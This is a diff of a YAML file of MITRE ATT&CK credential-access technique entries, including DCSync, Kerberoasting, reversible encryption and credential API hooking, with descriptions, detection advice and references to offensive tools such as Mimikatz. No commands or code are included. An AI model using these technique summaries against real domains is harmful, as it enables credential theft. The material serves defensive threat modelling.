+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -53213,6 +53911,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -53223,23 +53922,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -53310,9 +54036,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -53371,12 +54096,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -53408,6 +54132,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -53417,7 +54142,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -53429,111 +54153,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -53544,26 +54206,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -53576,6 +54300,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -53612,17 +54337,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -53668,81 +54393,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -53755,28 +54409,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
